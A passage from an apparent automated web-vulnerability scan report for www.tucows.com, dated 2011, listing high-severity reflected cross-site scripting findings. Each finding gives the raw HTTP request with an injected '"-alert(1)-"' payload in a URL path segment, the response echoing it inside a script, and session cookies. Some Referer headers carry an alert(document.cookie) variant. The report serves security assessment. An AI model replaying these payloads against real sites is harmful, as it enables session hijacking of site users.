GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.340. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.341. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.342. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.343. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.344. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.345. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49df9"-alert(1)-"7cec1abd243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes49df9"-alert(1)-"7cec1abd243/js/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes49df9"-alert(1)-"7cec1abd243/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.346. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f1c"-alert(1)-"5f5b3393d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.347. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82b97"-alert(1)-"d0e2ad1d532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.348. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccea9"-alert(1)-"cd05073d4ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.349. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87352"-alert(1)-"0f2157d1bbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
